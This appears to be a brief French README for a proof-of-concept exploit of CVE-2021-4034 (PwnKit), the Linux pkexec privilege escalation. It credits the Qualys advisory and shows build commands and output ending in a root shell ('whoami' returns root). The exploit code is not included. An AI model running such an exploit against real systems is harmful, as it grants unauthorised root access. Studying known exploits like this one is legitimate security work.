
Preuve de concept d'exploitation pour CVE-2021-4034 (PwnKit) qui élève les privilèges à root sur les systèmes Linux vulnérables.
Évidemment pas original. Retravaillé pour comprendre ce qui se passe. Crédits à https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt pour avoir trouvé la vulnérabilité !
Autres PoC qui m'ont aidé à comprendre l'exploit :
make
❯ ./main
LOADED!
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)